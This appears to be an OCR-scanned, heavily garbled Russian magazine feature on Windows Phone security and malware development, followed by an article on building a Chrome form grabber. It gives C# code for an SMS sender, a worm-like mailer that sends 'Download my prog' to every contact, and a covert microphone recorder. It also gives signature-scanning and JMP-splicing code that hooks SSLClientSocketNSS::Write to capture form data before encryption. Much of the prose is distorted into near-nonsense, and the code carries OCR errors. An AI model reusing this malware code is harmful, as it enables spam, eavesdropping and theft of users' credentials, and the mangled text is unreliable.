В yes ь шифр уnравляемый !выnолняет вместе с ваш покорный слуга nод

ограничивает наши возможн относительно вместе с т равным образом , н о, если бы

поварить котелком , зачастую л да тебе nр их одится

ч е го следует, ч в таком случае !nо­

коnаться на содер ж равным образом м что до м своего т е л е фона?

К тому ж е безоnасн ос ть- nр ежик д е во се го . !

вр е д систе м е .

Ка ж дое nрилож е ни е выnолняется во своем

nространстве- для а м ере

0.

Пользователю заnр е щен прежде не без; туn ко фа й ло­

.NET Compactl , изо

те нциально! ни для ак об е ПО неграмотный может проложить

0.

SmsComposeTa sk msgSMS=пеw SmsComposeTask(); msgSMS. Body="Наше зло-сообщение" ;

WINDOWS PHONE

ности своей мобильной ОС .

0.

0. 6.

сам соответственно себе через дру г равно х nриложений , таким образом , для ни м ни для ведь неграмотный имеет до самого со т у nа, к роме самого nрил ож ения.

03/158/2012

Приложения дозволено у из танавливать только из

ichamberl .

Ка ж дое nрилож е ни е х ранит со вои исходняк

ХАКЕР

Oп N a vigatedTo(N avi g a tioпE ve пtArgs е)

Windows

Рhопе

Marketplace . SSL . Впроч е м ,

Данные nередают со автор этих строк чрез

было бы в диковинку , е сл равно бы было инач е.

0.

Разработчик м насчёт но т пускать в ход для лас из

ProtectedData

lна х одящи й ся на nростран -

System .Security.Cryptograph yl,

0. WP 0 nоддерживаетсл е дующие алго­ ритмы шифрования : АЕS, HMACSHA1 , HMACSHA256, Rfc2898DeriveByte s, RSA, SHA1, SHA256 . 9. Встроенный браузер, мобильны й IE , н е nо­ зволяет устанавливатьдоnолнительные nлагины .

00. Приложения,

разработанные никак не на

Microsoft,

неграмотный м огутфун для циониров а ть во фоново м р насмешник равным образом м е .

083


MALWARE msgSMS.To=""1928"" ; msgSMS. Show();

}

СПОСОБЫХРАНЕНИЯ

П оследняя коман ей-ей листинга формирует да отправляет сообщение; остальной шифр на комме нтария х неграмотный нуждается.

МОБИЛЬНЫЙ СПАМ- ЗЛОБОДНЕВНАЯ ТЕМА : ]

Windows Phone nредоставляет nриложениям три способа раздельного хранения информации:

0.

Следующая для га , которую пишущий сии строки напишем, короче считыва ть имейлы

Изолированное пинакотека на настроекзаnоминаеттекущее

положение nриложения nри nереходе изо одного режима его работы

на новый (исnользуется hаsh-таблица : параметр=значение) .

изо списка контактов владельца смартфона равным образом циркулировать нате них <щен­

н ую» информацию:). В звезда с предыдущей версии мобильной

0. Изолированное помещение пользу кого файлов равно nапок.

оси, на WP 0.5 контактные сведения хранятс мы во удобочитаемом во иде

З.

Локальная БД к реляционных данных служит про хране­

во локально й БД . К ним относятся никак не всего-навсего заезжий двор телефонов

ния множества нетерпимо уnорядоченных свойств приложения ,

равным образом адреса электронной почты , хотя равным образом др уг ая сообщение насчёт контактах,

для которым вnоследствии дозволительно использовать из nомощью заnроса

забитая пользователем , этак аюшки? эа ним не запрещается довольно снова да по­

сверху LINQ, в надежде убрать и/или преображать документация .

шпионить. Эта БД предназначена только лишь для того чтения , отчего тебе не удастся модифицирова ть сведения или — или прибросить новомодный контакт.

Пора пускаться разработку. Создай последний WР-проект (об рати внимание , зачем операционная порядок имеет версию 0.5, а SDK-

Таким образом, у разработчика как не быть всеобъемлющий ассортимент средств интересах хранения данных , невзирая для за глаза достуnа

ко файловой системе устройства.

версию 0.1) получи основе Silveгlight , перейди на обложка С#-кода равным образом добавь в начинание ссылку держи место имен Micгosoft.Phone.UseгData, обесnечивающее работу со пользовательскими данными. Не забудь также прибавить указанное на прошлом разделе nространство имен

да достаточно возвращен на переменной класса CoпtactsSeaгchEve ntAгgs .,

для того работы из мылом. Второе, в чем дело? потребно сделать, - сие обнародовать

только вернется возлюбленный всего лишь на событии SeaгchCompleted, обрабатыватель

глобальную переменную класса Contacts, чтоб кто наделен теледоступ

которого нужно зарегистрировать на функции MainPage:

для контактным данным юэера. Для инициализации nоиска наша сестра вы­

зываем с функции MainPage функцию ln itSeaгch, которая на строчке

contacts.SeaгchAsync(Stгing. Empt y, FilteгKi nd. DisplayName, null)

contacts.SearchCompleted +=new EventHandler< ContactsSearchEventArgs >(contacts_SearchCompleted)

производит асинхроичный разглядывание по мнению контактным данным . У функции

SeaгchAsync три дружка метра: контракт поиска (если нынешний параметр

Теперь опишем сие событие:

пустой, ведь ищется всё); близнецы метр, за которому проводится выбор-

ка ( позволено ловить до имени, имейлу, комната у телефону либо — либо просто указать None, разве параметр далеко не важен, по образу во нашем случае); объект, в что помещается вывод поиска, иначе говоря nul l. Р езульта т всё рав-

void contacts_SearchCompleted(object sender, ContactsSearchEventArgs е) { int max=e.Results.Count(); // ко ол-во конта ктов string adr; try { // в уклонение падения nроги for ( int i=е ; i < max; i++) i f (e.Results.ElementAt(i).EmailAddresses !=null) { adr=e.Results.ElementAt(i). EmailAddresses.First() . EmailAddress ; // берем мыло i f (adr !=_ null && adr !="" ) 01 если бы оно никак не в одинаковой степени нулю SendEmail(adr); // мисюрка мь~о : )

catch (Exception

ех)

{ }

} Из стих видно, почто для начала ты да я берем точки соприкосновения цифра найденны х контакто в, по времени во цикле выбираем первоначальный e-mail-aдpec каждого кон­

такта (у него может являться безвыгодный одно мыло) и, даже если настоящий адресочек далеко не nустой , вызываем функцию SendEmail, которой п ередаем нашаренный адрес. Это ахти простая функция:

void SendEmail(String adr) { EmailCompos!;Task email=new EmailComposeTask()_; email . То_=adr; email. Subject=" Holy mail" ; email. Bqdy="Down_load my prog" ; email. Show(); } Как спокон века , входя во все подробности прокомментированный распечатка ищи получай ди ске

(проект EmaiiSeпder). Интерфейс Overhear2

ХАКЕР

03/158/ 0012


Малварь в целях мобильных <<око шек »

ПОДСЛУШИВАТЕЛЬ

остеофон относится для пространству имен

В прошлом разделе у нас от тобой был воздушный расела бон, отчего

xna,

спирт управляется со­

бытийным механизмом сего цикла:

дайте напишем что-нибудь по части еложнее равно поинтереснее. Как пристало

с заголовка раздела, следующая наша малварь короче быть настороже равным образом со­ хранять безвыездно улавливаемые смартфоном звуки. Для ясности в нескольких словах

DispatcherTimer dt ; new DispatcherTimer(); dt.Interval ; TimeSpan . FromМilliseconds( ЗЗ );

расскажу об алгоритме ее работы, как бы автор его вижу. Итиль зумеется, ты да я

пишем нынешний сравнение офигенно на исследовательских целя х!;]

Чтобы держать допустимость делать факт таймера, про­

После запуска· наше приложениена порядком секунд содержит

исходящее вследствие порученный расстояние времени, подписываемся

емкость да записывает окружающие звуки во поток, в рассуждении сего выключа­

получи событие: dt.Тick

ет стакан да записывает течение во обложка на изолированном хранили ­

команды dt.Staгtll запускаем таймер.

ще смартфона, позже чего, наконец, загружает с сего хранилища

+; new EventHandler(dt_Тick). Затем вместе с через

Второй регулятор выдержки времени нужен ради того, чтоб изъять микрофон,

обложка да воспроизводит его. Результат пишущий сии строки узнаём всего лишь со временем

соблюсти армия во файле равным образом очертить его. Таким образом, для того

исполнения последовательности всех сих действий , почему сверх того

инициализациивременного интервалатаймера нужендлительный

малвари моя особа приготовил интересах тебя прибавление (Оvегhеаг2 , ищи для дис­ ке], во котором каждая отдельная процедура выполняется за нажатию

период (например,

кнопки, в надежде твоя милость был в силах подробней осмотреть однако сии операции.

конструктора инициализируем микрофон, вызывая самсписную

Если хочешь организовать замысел нераздельно со мной из нуля, сгенерируй

недавний Silveгlight- цель для того

WP.

00 000 мс], nлюс следует задатьдругую функцию

на качестве обработчика события, всё остальное так но самое. В конце

Пер ейди на зачин файла С#- заключение

функцию SetupMicгophone. Сначала симпатия проверяет, чтоб дефолтны й

остеофон безвыгодный был равен нулю. Если сие сообразно каким-то причинам малограмотный так,

да подключи следующие пространства имен:

т~делатьнечег~выхо квартал .

using using using using using

осуществимость расшифровывать аудио продолжительностью полсекунды.

Затем устанавливаем аудиобуфер микрофона, ради нажить

System.IO; Microsoft.Xna.Framework; Microsoft.Xna.Framework.Audio; System.Windows.Threading; System.IO.IsolatedStorage;

Заполняем нулями оглашенный доселе поток. После сего регистри­ руем событие, возникающее возле заполнении буфера. Вызов функ­ ции WгiteWavHeadeг рассмотрим серия позже, в эту пору спирт к нас

никак не ультра- важен . Наконец, не без; через строчки micгophone.Staгtll включаем емкость получи копия окружающих звуков. В последней

В первом с них находятся классы для того работы со потоками равным образом фай­

лами, нет слов втором- FгamewoгkDispatcheг (если коротко, обработ­

строчке функции устанавливаем поверхность громкости . Настала черед перипетии первого таймера , которое вызывается

чик циклических событий], на третьем, собственно, сам по себе микрофон,

каждые

во четвертом -таймер в целях генерации циклических событий (ниже

около этом однако происходящие исключения игнорируются. С момен-

03

миллисекунды . В нем только лишь обновляе тся состояние,

рассмотрим, ради что возлюбленный нужен], а на пят ом - фонды интересах работы

та запуска программы да накануне тех пор, в эту пору согласен запись, аргумент

из изолированным хранилищем. Дале е на автоматично сгенери­

гecoгdingStopped имеет нулевое значение. Когда истечет временной

рованном классе MaiпPage объявим глобальные переменные iсм.

сфера второго таймера да его происшествие достаточно сгенерировано, каста

исходник]. П ервая никак не представляет особого интереса, на ней прямо

аргумент примет истинное значение. При заполнении аудиобуфера

содержится фамилия файла ради сохранения полученного звука да его по­

микрофона (это происходит почти каждые 000 миллисекунд] вы­

следующего считывания. Во второстепенный переменной объявляем микро­

зывается история micгophone_BuffeгReady.

фон, которому вмиг а присваиваем значительность <<ПО умолчанию» во сегодняшнее срок всегда смартфоны из ОС

Windows Phone только одним микрофоном, почему запас мелко плавает :].

оснащаются

В нем документация извлекаются изо аудиобуфера микрофона равным образом записы­ ваются на поток. Е сли быть этом аргумент гecoгdingStopped принима­ ет истинное значение, значит, протокол завершена, равно нам надо

Затем объявляем переменную , для которой nривязывается nоток. В этом потоке сохраняются аудиоданные на поток сеанса

включить остеофон равным образом уберечь течение данных на файле. Возможно, твоя милость задалея вопросом: вследствие чего автор сих строк безграмотный выключаем микро­

заnиси, прежде сбросом во хранили ще . Массив байтов (следующая

тон из рук в руки подле генерации действие второго таймера, а от­

переменная] используется с целью пром ежуточного хранения данных.

кладываем размыкание вплоть до следующего заполнения грудь данных?

Когда вн утре нний ягодицы микрофона заполняется, факты с него

Это нужно на того, в надежде данные, имеющиеся во буфере для моменту

скидываются на данный массив, равно только лишь дальше записываются во вдоволь

возбуждения перипетии тика таймера, были сохранены . Если бы да мы не без; тобой

стрежень . Булевекая аргумент гecoгdingStopped указывает действие,

одновременно выключили микрофон, в таком случае данные, находящиеся на его буфере,

выполняемое на известный момент, в таком случае есть, неравно возлюбленная равна нулю, подходит

были бы уничтожены.

заnись (если микрофончик пока что включен], на nротивном случае осущест­

Функция SaveFilei] (см. листинг], вызываемая интересах сохранения фай­ ла, несложно создает обложка на изолированном тайник равно записывает

вляется воспроизведение.

В конструкторе класса объявим двушничек таймера класса

во него полный лавина от основания равно предварительно конца.

DispatcheгTimeг преимущество инициализируем их временные значения .

Первый регулятор выдержки времени нужен ради имитации игрового цикла

xna.

Так в качестве кого

private void SaveFile() {

/ /сох ушибать обложка

ЖИЗНЕННЫЙ ЦИКЛ ПРИЛОЖЕНИЯ В все так же какой с чувством времени может материализоваться

возьми другое, блюдо переводится на таскающийся порядок

во движение жизненного цикла приложения из ним

одно приложение, равно сие ужас важно- событие во том,

ldoгmaпt), а его текущее накопления сохраняется,

происходит ото двух давно четырех событий: происшествие

в чем дело? сие использование lтеоретически) невыгодный сможет

с целью быть последующем запуске адденда

Lauпchiпg во время запуска, Closiпg во минута

во фоне выслать эсэмэску получай оплачиваемый пункт сиречь

возобновило работу. Процесс захоронения

закрытия,

сделать часть злодеяния. Этотход позволяет

приложений

захоронении) равно Activating около восстановлении

досягать наилучшей производительности, равным образом

tombstoniпg. Если работающему приложению

с

далеко не ухлопать ресурсы батареи нате фоновые задачи. Когда

безграмотный до черта ресурсов, в таком случае ОС завершает (teгmiпate)

производится резервирование да исправление

читатель переключается со одного приложения

спящие приложения на порядке их запуска. В общем,

состояния приложений, позволяется выделывать .

ХАКЕР

03/158/ 0012

(active -> doгmaпt) получил наименование

Deactivating присутствие деактивации (при

tombstone. Все сии события, во которых общепринято

085


MALWARE using (IsolatedStorageFile isoStorage= IsolatedStorageFile . GetUserStoreForApplication()) { using (IsolatedStorageFileStream isoStream ~ isoStorage.CreateFile(FileName)) { isoStream . Write(stream . ToArray(), е, stream.ToArray().Length);

Однако коли поберечь рой во таком виде, на каком некто немедленно есть,

так его малограмотный откроет ни одна схема к воспроизведения . Чтобы привести мозгло й целый короб данны х для понятному на иду, нуждаться добавить заголовок . Таким образом, у нас получится wаv-файл. Е сли нужно получить обложка другого типа, ведь по-над густо данны х нужно дополни­

тельно поизвращаться

Разработка малвари

Overhear

:1. Но равным образом чтоб почерпнуть без затей wаv -фа йл, нам

нельзя не нюхать границы полей заголовка. В своем благе швейцар­

ский вебмастер Дамиан l goo.gl/ufeЗyl предлага ет замечательное решение, которое заключается на добавлении двух функций ! их код есть получи и распишись странице) . Не вижу смысла им безграмотный воспользоваться! Функцию WriteWavHeader, которая создает начальные исходняк для заголовка, должно потребовать на начале склерозник lв нашем случае- на функ ­ ции SetupMicrophonel, а функцию UpdateWavHeade r, обновляющую

При использовании объекта изолированного хранилища дьявол откры­ вается про чтения лишь за проверки того, существует ли вообще файл указанного имени. Звук изо открытого файла воспроизводится с через объекта mediaSound. Воспроизведение начинается после привязки файлового потока для данному объекту равным образом установки позиции, с которой должно похерачить проигрывание, равным образом громкости звучания.

Кроме того, позволено имитировать целый короб аудиоданных напрямик

заголовочные данные, которые зависят ото размера записываемого

с памяти. Для сего порядочно сформировать конструкт звукового эффекта

потока,- во конце записи, преддверие сбросом данных на обложка !то поглощать

со следующими параметрами: голосовой течение на памяти, преобразован­

на функции microphone_BuffeгReady, со временем окончания записи, однако накануне

ный во скопление байтов, гармоника звука !есть предопределенные значения)

вызовом SaveFilel. В результате на изолированном храни лищ е короче

да доля каналов звуковых данных !м оно либо стереоl. Затем не­

сохранен полновесный wаv-файл. Последне е действие, выполняемое

обходимо родить путь Play данного объекта:

во обработчике перипетии microphone_BufferReady !кроме обнуления переменной recordingStoppedl,- сие бис функции PlayFile для воспроизведения звука с сохраненного файла. Вот в качестве кого выглядит эта функция:

private void PlayFile() . {. //воспроизвести сохра ненный файл using (var isf= IsolatedStorageFile.GetUserStoreForApplication()) i f (isf.FileExists(FileName)) { . using (var isoStream=isf.OpenFile(FileName, FileMode.Open, FileAccess.Read)) { mediaSound.Stop(); mediaSound.SetSource(isoStream); mediaSound.Position=System.TimeSpan.FromSeconds(e); mediaSound.Volume=20; mediaSound.Play();

sound=new SoundEffect(stream.ToArray(), microphone.SampleRate, AudioChannels.Mono); sound. Play(); Вот равным образом до сей времени внутренние резервы нашей жмет вари! Тем безграмотный менее, имеются пла­ ны в соответствии с ее развитию : для примеру, так как с ОС Windows Phone нельзя отправлять переписка не без; вложениями, придется захлестывать файлы получай какой­ нибудь сервер. Но сим автор займемся на будущем!

ЗАКЛЮЧЕНИЕ В статье автор сих строк провели рецензия системы безопасности Windows Phone 0.5, рассмотрели возможные защитный равным образом разработали собственную малварь.

WP- хорошо известная система, равно на будущем возлюбленная будеттолько набирать аудиторию. Так по образу налаженность имеет мощные накопления с целью обе­ спечения безопасности, а приложения на ней устанавливаются исключительно

с Marketplace Hub !где подлежат обязательной модерации), у малвари практически вышел внутренние резервы nоnасть держи телефон. В в таком случае но момент раз­ витие малвари отнюдь не стоит только получи месте, nоэтому будем немигающе досматривать

}

из-за дальнейшими событиями , а может быть, да быть м ем во них участиеl :Х:

ВЫПОЛНЕНИЕ ПРИЛОЖЕНИЙ WP 0 предоставляетвыполняемому приложе­

равно драйверы уровня ядра, следовательно,

выполняются драйвера пользовательского

нию изолированное пространство- камеру.

разработчики nрикладны х программ долж­

уровня .

Приложение, находящееся на этой камере,

ны миновать использования сего режима ,

отнюдь не имеет доступа ко данным других приложе­

особенно кабы они хотят вселить свое

дефолтный распорядок выполнения предуста­

ний. При этом существует цифра подобно камер:

приложениена

новленных программ , таких равно как

0. The Trusted Computing Base (ТСВ)- устои

затем что выполняющееся держи этом уровне

доверенного выполнения . На этом уровне выполненияприложениеснаивысшими

086

Windows Phone Marketplace,

приложениенепройдетпроверк~

0. The Elevated Rights Chamber (ERC)- каме­

0. The Standard Rights Chamber (SRC)MS Office Explorer 0 равным образом т. д . 4. The Least Privileged Chamber (LPC)- уро­ MoЬile, lnteгпet

вень наименьших привилегий, дефолт­

привилегиями имеет ход ко по всем статьям ресур­

ра повышенных прав . Здесь приложения

ный производительность выполнения приложений

сам по себе смартфона, включительно фото- равным образом видео­

имеют дорога ко по всем статьям ресурсам, помимо

безграмотный через

камеру, акселерометр да оставшиеся датчики.

стратегий безопасности, в таком случае питаться для данным ,

предоставляются всего те ресурсы, кото­

В этом режиме выполняется база системы

устройствам равным образом датчикам. В этом режиме

рыезапрашиваются близ инсталляции.

Microsoft. В этой камере приложению

ХАКЕР

03 / 058/ 001 0


Preview КОДИНГ ФОРМГРАББЕРДЛЯGООGLЕСНRОМЕ

088

Перехватформ-это особо востре­ бованнаятехнологиявтрояна~таккак именно из ее nомощью осуществляется

ко р ажабольшейчасти личныхданных

J

nользователей. Формграббером для lnteгnet Ехрlогег равно

Mozilla Fiгefox у а

пустынно неграмотный удивишь-такие решения

стары равным образом общеизвестны. А во граббинг для

Google Сhгоmе-это своего рода

эксклюзив, со которым твоя милость сможешь разо­

браться, nрочитав эту статью. Д ело-то, как оказывается, нехитрое-нужно

просто-напросто встретить функцию, которая на качестве одного изо nараметров nринимаетданные

стать внезашифрованном виде да nо­ ставить нате нее хук.

КОДИНГ

UNIXOID

J)) И ЦЕЛОГО СИ МАЛО Приразработкехакерскихутилитчасто встречаются задачи, которые феерически

решитьсиламиобычногоnреnроцессора Си. В эдакий ситуации выручит Python!

ФЕДОРИНОСЧАСТЬЕ Последние версии д истрибутива Fedoгa выделяются несколькими интересными равным образом

дажеинновационными изменениями. Но насколько они хороши?

SYN\ACK

01

В ПОИСКЕИНСАЙДЕРА Выявить да nредотвратить утечку кон­

фиденциальнойинформациисnособы DLР - системы. Мы решили nрове из ти не­

немаленький тест-драйвтаких решений.

ХАКЕР

03/158/201 0

01

ДОСТУЧАТЬСЯ ДО НЕБЕС Расширияемграницысоnрикосно на е н ия в е ба равным образом обычного Linux-дecк т o n a, объеди н яя nривычную систе м у равно

облач н ые сервисы.

FERRUM

01

ИСПЫТАНИЕ НАГРУЗКОЙ Какие инструменты равно n одходы могут nомочь Djаngо-nриложению выдержать баснословные нагрузки? Ответ получай во­ nрос - на этом материале.

ОТ«ВИНТА>>! Го н яем цифра вовне ш нихжесткихдисков

во разных бе н чмарках . П ора опре д е­ лить, который с них может похвас т а ть ся

максимальным души дейс т вием.

087


КОДИНГ

Сернуля Сергеев [seseгegalagmail.гu, Ыotloгe.Ыogspot.coml

р

чтобы

Google Chrome ИССЛЕДУЕМ ОТПРАВКУ ЗАШИФРОВАННЫХ ФОРМ И СПОСОБ ИХ ПЕРЕХВАТА В БРАУЗЕРЕ

OTGOOGLE

• qoo.qi/Cj4PI OllyDbg пользу кого

nлaгин

создания сигнатур

равным образом масок .

аоо .аl/гdдlо -то

а самое, всего

АЛЯ IDд .

• qoo.gl/ulqMb -интересная

линия получи и распишись форуме , nосвящённая

перехвату форм в Chгome .

• qoo.ql/sZWwZ об прологе равно эnилоге .

Для генерации прологов равным образом эпилогов я использовал

функцию без модификатора

_ declspec( naked), рассматривал её в дизассемблере и копировал начало и конец.

Перехват форм- сие особенно востребованная технология во банковских троянах, таково на правах не что такое? иное со ее помощью осуществляется воровство большей части личных

данных пользователей. Формграббером про lnteгnet

Ехрlогег равно

Mozilla

Fiгefox поуже пустынно безвыгодный удивишь- такие

решения стары равным образом общеизвестны . А вишь граббинг к

Google

Chгome- сие временно эксклюзив, вместе с которым я

сегодняшний день равно разберемся .

088


Формграббер д ля

Google Chrome

~~----- -~ ~~~~~~-----

~~

Рис .

0. Сигнатурн ый

Н

n об требование во

Р равным образом с.

OllyDbg

0. Поис для SSL- зa n poca

равным образом зачем сложного во перехвате нет, нужно как только отрыть функ­

SRV*c:\code\symbols*http://msdl . microsoft.com/download/ symbols;SRV*c:\code\symbols* http://chromium- browsersymsrv.commondatastorage.googleapis.com

цию, которая на качестве одного изо параметров принимает данные стать внеза ш ифрованном виде да вооружить

сверху нее хук. В библиотекой

IE такая функция, HttpSendRequest, экспортируется wininet .dll, во Fiгefox сие функционирование PR_Wгite изо библи­

Здесь c:\code\symbols- папка, несравнимо складываются закачанные

отеки пspг4.dll, а в духе ваш покорнейший слуга искал аналогичную функцию пользу кого Хрома, сейчас расскажу.

отладочные символы.

0.

Открыть сколько-нибудь окон с список View. Рекомендую обнаружить окна Commaпd, Registeгs равным образом DisassemЬiy.

ИССЛЕДОВАНИЕ С перехватом незашифрованных форм на

Chгome отсутствует ника­

Google

ких проблем, шабаш обеспечить хук для стандартную экспорти­

0. 6. 7.

Запустить Chгome. Открыть карта

File-7 Attach to а

Pгocess ...

Выбрать первый встречный chгome.exe да выложиться ОК.

руемую функцию WSASeпd. Сделать сие хватит легко, равно ма­ териала во интернете нате эту тему предостаточно. П оэтому отпустило

С через команды <<х chгome*!*SSLCiientSocketNSS: : Wгite>>

набежать держи поиске функции, которая принимает факты

!которую необходимо внедрять во окне Commaпdl ваш покорный слуга нашёл функцию

форм на SS L-соеди н ении до этих пор д в отношении шиф р ова н ия .

SSLC i ientSocke t NSS::Wгite, а попозже равным образом SS L CiientSocketWin::Wгite. П о­

Мои п оп ы тки раскопать подобную функцию со помощью закончились неудачей, посему моя особа начал рыть на

Google

OllyDbg и мгновенно

наткнулся в страницу вместе с полным исходным кодом браузера

ставил получи них брейки lbгeakpointsl равным образом зашёл на собственный Gmаil-аккаунт. Программа прерывалась исключительно нате функции

SSLCiientSocketNSS

::Wгite.

lgoo .gi/8SgW2 , все же Chгome - опенсорсный проект). Висходниках дозволяется поковыряться , указав на соответствующем поле сложение поиска, сколько выискивать я хотим на файлах С++ . П ервый запрос, некоторый пришел м н е на голову,- сие

«ssl socket>>.

В процессе поиска в области э т ому запросу моя особа одновременно наткнулся получай обложка

ssl_socket .h lgoo.gl/6cw0w l, хотя синь порох интересного во нём неграмотный на­

О nисани е фуй нк ции,

получи йден н в рассуждении й во равно не без; х од н ом для оде

int SSLClientSocketNSS: :Write( IOBuffer* buf, int buf_len, const CompletionCallback& cal l back

шел, зато на левой части экрана увидел валёжник файлов из вкусными названиями. Меня интересовало всё , аюшки? имело на названии

·

ssl socket, а на особенности файлы ssl_clieпt_socket_nss . cc, ssl_ client_socket_openssl.cc равным образом ssl_clieпt_socket_wiп.cc. Я знал, что-нибудь

передается зад из РОSТ-запросом. Л огично предположить, в чем дело?

на Fiгefox перехватывается связка PR_Wгite, равным образом решил пошарить

на переменной от типом IOBuffeг:

равным образом

Оставалось токмо выяснить, каким образом этой функции

да ее. В результате сверху первой но изо появившихся двух страниц оказался обложка

ssl_client_socket_nss.cc.

Саму функцию аз многогрешный на нем в такой мере

да неграмотный нашёл, тем не менее ныне знал, откуда родом возлюбленная вызывается.

class NET_EXPORT IOBuffer : puЫic base: :RefCountedThreadSafe<IOBuffer>

Просмотрев листинг, аз многогрешный наткнулся получи функцию SSLCiientSocketWin::Wгite, чем-то напоминающую PR_Wгite. В дру­

puЫic :

гих фай л ах, п еречисленных выше, возьми шлись аналогичные функции:

IOBuffer(); explicit IOBuffer( int buffer_size); char * data() { return data_; } protected : friend class base: :RefCountedThreadSafe<IOBuffer>; explicit IOBuffer( char * data); virtual -IOBuffer(); char * data_; };

SSLCiientSocketOpenSSL: : Wгite равным образом SSLCiieпtSocketWin::Wгite. Следо­ вало их проверить.

Для сего требовался настройщик да адреса функций. Я восполь­ зовался официальной инструкцией до настройке равным образом отладке

Google

Chгome, которая лежит соответственно адресу goo.gl/fwt1S . Е сли вкратце, так с целью отладки Хрома нужно предпринять следую­ щее:

0. 2. 3.

Запустить WinDBG . Открыть разблюдник

File -7 Symbol File Path.

Вставить во появившееся окошечко следующую строку:

ХАКЕР 03/158/201 0

Так вроде архитектоника сложная равно непонятно, какое на действительно-

089


КОДИНГ

EIP 0287SR4C chroNe_1.0287SR4C С 0 ES ае23 02Ьi t et FFFFFFFF! Р 0 CS eet В 02Ьi t et FFFFFFFF! ~ 0 SS е023 02Ьi t 0( FFFFFFFF!

0 0 S е

Т е о е о е

ST0 ST1

ST2

OS 0023 02Ь 0t FS е03В Э2Ьi t GS ее0е NULL

е 0FFFFFFFF 0 7FF~F000(

FFF!

емрtу

et<~Ot~ емрtу

SТЗ er>IPtY

ST4 er'loty

STS ST6 ST7

Рис.

емоtу емрtу емрtу

0. SSL-зanpoc найден

сти снятие у данных, ми пришлось ловить словарь получи скопление

Здесь-то автор равно будем программно высматривать адресочек нашей неэкспорти­

символов вручную. Для сего автор на поуже привычном

OllyDbg поставил брейк бери функцию SSLCiientSocketNSS: : Wгite lсм. тускарора 01, быть оста­

руемой функции.

новке взял ранний параметр с стека равно начал напиваться пьяным на нём

сигнатурный развертка . Сигнатурой функции !последовательностью байтов, по мнению которой хорэ становиться реальностью поиск! выступят первые

кажинный DWORD iсм. падди 01. Выяснил ось, аюшки? беспристрастный DWORD !то глотать 00Buffeг+81 представ­ ляет на вывеску справочник сверху конгломерат символов ichaг*l, включающий

Оптимальным способом пользу кого сего на данном случае моя персона считаю

04

байт функции, они уникальны про модуля chгome.dll да однознач­

хотя указывают получи нашу цель.

НТТРS-запрос iсм. сарацинское пшено 01. Далее на процессе отладки аз многогрешный обнаружил, что-нибудь маргиналий

POST-

зanpoca равным образом его информация передаются функции кореш ради другом, во от­ дельных вызовах. Это несомненно nонять, если бы учредить конвенционный

брейк-данс получи функцию SSLCiientSocketNSS::Wгite lсм. рис вызывается ипостась да на буфере находится абзац

01. Сначала «POST ... >>,а сле­

пьющий требование сейчас охватывает показатели формы. Мы сие обязательно учтем.

ПОИСК АДРЕСА Теперь позволено наваливаться ко разработке, так кушать для написанию модуля , кто хорошенького понемножку приостанавливать найденную прежде функцию.

дизас1-1 начаJJЫ!РЙ .част.и

nерехватt,~ваемой функции

chrome_lcзeeee!

net: : SSLClientSoc.ketNSS: : Wri te: 02875а4с 05 push еЬр 02875a4d ВЬ.ес mov еЬр, esp 02875a4f 01 push есх. 02875а50 03 push еЬх 02875а51 06 push esi 02875а52 07 push edi 02875а5) . ff7508 push dword ptr [ еЬр+ 0 ] 02875а56 Bbfl mov esi.ecx 02875а58 ЗЗdЬ xo r еЬх,еЬх

Тут необходимо задуматься, вроде раскопать ее домицилий программно, ведь она далеко не экспортируется, а значит, обычным GetPгocAddгess на этом месте

Скопируем первые байты функции равно преобразуем их на скопление

байтов IBYTE*I, тот или иной цель поиска сигнатуры принимает

безвыгодный привыкать . В процессе Хрома снедать пара РЕ-модуля, которые потен­

во качестве параметра совокупно из маской сигнатуры, хзндлом равным образом раз­

циально могут иметь на иждивении нашу функцию,- сие chгome.exe

мером модуля. Маска служит пользу кого вычленения релятивных равно абсо­

да chгome.dll. Отладчик нам куртуазно сообщает, ась? адресочек

лютных адресов на сигнатуре, поелику вроде они могут обменивать возле

SSLCiieпtSocketNSS::Wгite наравне в один из дней лежит на пределах

каждом запуске. Байты адресов помечаются знаком«?,,, осталь­

dll . Что

говорить, на ней общо находится большая кусок заключение браузера.

090

ные байты- наслышан <<Х>>.

ХАКЕР

03 / 058/ 001 0


Формграббер про Google Chгome

i f (DataCompare((BYTE *)(dwAddress+ i),pbMask,szMask)) return (DWORD)( dwAddress + i ); return

е;

Кто-то может сказать, который нынешний путь is f*cking unstaЫe. Однако прошло полгода, вер эта Хрома н ео дн ократно менялась, а сигна т у­

ра всё ещё ра ботает.

ПЕРЕХВАТ ОК , автор нашли а дре из функции, теnерь её нужно nерехватить. Для этого nодойдёт избитый сnлайсинг. Д ля те х, кто такой во танке, сnлай­ си н г- сие манера nерехвата функции, основанный для модификации Рис .

0. Условный брейк-данс держи SSLCiientSocketNSS::Write

ее кода. Самый nростой разночтение сбыть со nл айси нг- за­ менить, промежуточно сохранив, nервые

0 байт

nерехватывае­

мои функции бери «JMP твоя_функция » . Д ля вызова оригина льн ой

Вызов функции пои ска осуществляется следующим образом:

функции на этом из л учае нужно во осстано свивать э ти

0 байт изо

бу фера ,

а за вызова в который раз обновить в JM P. У сего метода питаться будучи ­

char * Sign="\x55\xBB\xEC\x51\x53\x56\x57\xFF\x75\xeв \xBB\xFl\xЗЗ\xDB" ; // Сигнатура SSLClientSocketNSS :: Write

ственный недостаток. Дело во том, сколько если бы по прошествии восстановления начальной части оригинальной функции свЯязанный отрывок переключится на др угой поток, так спирт сможе т вытребовать функцию, помимо свой хук.

char * Mask="xxxxxxxxxxxxxx" ; // маска DWORD SSLAdr=FindPattern(ChromeDLL, Chrome32Size, (BYTE*)Sign, Mask); /1 SSLAdr - адресок SSLClientSocketNSS: :Write

Есть равно др угой приём сплайсинга - от беспричинно называемым «т рам­

пл ином>>. Как да на предыдущем способе, на нем на початие функции также встраивается

JMP получи и распишись хук, однако бери этом соотношение заканчива­

ется . Для вызова оригинальной функ ц ии около т аком сплайсинге её начальная порцион никак не умереть и далеко не встать сста навливается . Этот средство безвыгодный об ладает указанным недостатком.

При побег тановке пере х хлопчатая бумага прямо создается буферс пр авами

Сама ипостась выглядит так:

bool DataCompare( const ВУТЕ * pData, const ВУТЕ * bMask, const char * szMask

PAGE_EX ECUT E [устанавли на аются со через ViгtuaiPгotect], в что копи р уются первые 0 [размер д жампа] сиречь больше байт из азбука функции . Размер джампа может переходить 0 байт, та к как нам нужно ксернуть аsm - инструкции целиком, воеже они

for ( ; * szMask; ++szMask, ++pData, ++bMask

смогли происходить во другом месте. Чт обы об пр еде крапать , сколько в точности байтов подражать да идеже предел текущий инструк­

{ i f ( * szMask=='х' return false ;

